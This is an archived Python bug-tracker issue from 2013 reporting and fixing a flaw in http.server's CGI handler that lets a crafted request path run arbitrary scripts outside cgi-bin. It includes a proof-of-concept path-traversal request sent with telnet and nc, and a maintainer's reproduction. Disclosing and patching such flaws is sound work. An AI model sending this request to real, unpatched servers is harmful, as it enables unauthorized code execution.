This issue tracker has been migrated to GitHub ,
and is currently read-only.
For more information,
see the GitHub FAQs in the Python's Developer Guide.
Created on 2013年10月29日 16:34 by Alexander.Kruppa, last changed 2022年04月11日 14:57 by admin. This issue is now closed.
| Files | ||||
|---|---|---|---|---|
| File name | Uploaded | Description | Edit | |
| cgi.patch | benjamin.peterson, 2013年10月29日 21:10 | review | ||
| Messages (6) | |||
|---|---|---|---|
| msg201645 - (view) | Author: Alexander Kruppa (Alexander.Kruppa) | Date: 2013年10月29日 16:34 | |
An error in separating the path and filename of the CGI script to run in http.server.CGIHTTPRequestHandler allows running arbitrary executables in the directory under which the server was started.
The problem is that in CGIHTTPRequestHandler we have:
def run_cgi(self):
"""Execute a CGI script."""
path = self.path
dir, rest = self.cgi_info
i = path.find('/', len(dir) + 1)
where path is the uncollapsed path in the URL, but cgi_info contains the first path segment and the rest from the *collapsed* path as filled in by is_cgi(), so indexing into path via len(dir) is incorrect.
An example exploit is giving the request path:
///////////badscript.sh/../cgi-bin/cgi.sh
Note that Firefox and wget at least simplify the path in the request; to make sure this exact path is used, do for example:
(echo "GET ///////////badscript.sh/../cgi-bin/cgi.sh HTTP/1.1"; echo) | telnet localhost 4443
This causes the CGIHTTPRequestHandler to execute the badscript.sh file in the directory in which the server was started, so script execution is not restricted to the cgi-bin/ or htbin/ subdirectories.
|
|||
| msg201647 - (view) | Author: Christian Heimes (christian.heimes) * (Python committer) | Date: 2013年10月29日 16:48 | |
I can confirm the issue: $ mkdir www $ cd www $ cat << EOF > badscript.sh #!/bin/sh echo hacked EOF $ chmod +x badscript.sh $ ../python -m http.server --cgi $ echo "GET ///////////badscript.sh/../cgi-bin/cgi.sh HTTP/1.1" | nc localhost 8000 HTTP/1.0 200 Script output follows Server: SimpleHTTP/0.6 Python/3.4.0a4+ Date: 2013年10月29日 16:47:22 GMT hacked |
|||
| msg201673 - (view) | Author: Benjamin Peterson (benjamin.peterson) * (Python committer) | Date: 2013年10月29日 21:10 | |
Patch |
|||
| msg201747 - (view) | Author: Roundup Robot (python-dev) (Python triager) | Date: 2013年10月30日 16:51 | |
New changeset e4fe8fcaef0d by Benjamin Peterson in branch '2.7': use the collapsed path in the run_cgi method (closes #19435) http://hg.python.org/cpython/rev/e4fe8fcaef0d New changeset b1ddcb220a7f by Benjamin Peterson in branch '3.1': use the collapsed path in the run_cgi method (closes #19435) http://hg.python.org/cpython/rev/b1ddcb220a7f New changeset dda1a32748e0 by Benjamin Peterson in branch '3.2': merge 3.1 (#19435) http://hg.python.org/cpython/rev/dda1a32748e0 New changeset 544b654d000c by Benjamin Peterson in branch '3.3': merge 3.2 (#19435) http://hg.python.org/cpython/rev/544b654d000c New changeset 493a99acaf00 by Benjamin Peterson in branch 'default': merge 3.3 (#19435) http://hg.python.org/cpython/rev/493a99acaf00 |
|||
| msg222911 - (view) | Author: Roundup Robot (python-dev) (Python triager) | Date: 2014年07月13日 05:21 | |
New changeset d367ea865ea4 by Ned Deily in branch '2.7': Issue #21323: Fix CGIHTTPServer to again handle scripts in CGI subdirectories, http://hg.python.org/cpython/rev/d367ea865ea4 New changeset 4de94641ba3e by Ned Deily in branch '3.2': Issue #21323: Fix http.server to again handle scripts in CGI subdirectories, http://hg.python.org/cpython/rev/4de94641ba3e New changeset b957f475e41e by Ned Deily in branch '3.3': Issue #21323: Fix http.server to again handle scripts in CGI subdirectories, http://hg.python.org/cpython/rev/b957f475e41e New changeset 385f4406dc26 by Ned Deily in branch '3.4': Issue #21323: Fix http.server to again handle scripts in CGI subdirectories, http://hg.python.org/cpython/rev/385f4406dc26 New changeset 22e5a85ba840 by Ned Deily in branch 'default': Issue #21323: Fix http.server to again handle scripts in CGI subdirectories, http://hg.python.org/cpython/rev/22e5a85ba840 |
|||
| msg222913 - (view) | Author: Ned Deily (ned.deily) * (Python committer) | Date: 2014年07月13日 05:34 | |
See Issue21323 for details of a problem introduced by the original fixes for this problem and now fixed (except for 3.1 which is now end-of-life). |
|||
| History | |||
|---|---|---|---|
| Date | User | Action | Args |
| 2022年04月11日 14:57:52 | admin | set | github: 63634 |
| 2015年10月02日 00:47:18 | martin.panter | link | issue14566 superseder |
| 2014年07月13日 05:34:43 | ned.deily | set | nosy:
+ ned.deily messages: + msg222913 |
| 2014年07月13日 05:21:15 | python-dev | set | messages: + msg222911 |
| 2013年11月01日 00:39:27 | Arfrever | set | nosy:
+ Arfrever |
| 2013年10月30日 16:51:29 | python-dev | set | status: open -> closed nosy: + python-dev messages: + msg201747 resolution: fixed stage: test needed -> resolved |
| 2013年10月29日 21:10:13 | benjamin.peterson | set | files:
+ cgi.patch keywords: + patch messages: + msg201673 |
| 2013年10月29日 18:49:24 | janzert | set | nosy:
+ janzert |
| 2013年10月29日 16:54:48 | glondu | set | nosy:
+ glondu |
| 2013年10月29日 16:51:02 | barry | set | nosy:
+ barry |
| 2013年10月29日 16:48:40 | christian.heimes | set | priority: normal -> release blocker assignee: christian.heimes versions: + Python 2.7, Python 3.3, Python 3.4 nosy: + larry, benjamin.peterson, georg.brandl messages: + msg201647 stage: test needed |
| 2013年10月29日 16:35:41 | vstinner | set | nosy:
+ vstinner, christian.heimes |
| 2013年10月29日 16:34:01 | Alexander.Kruppa | create | |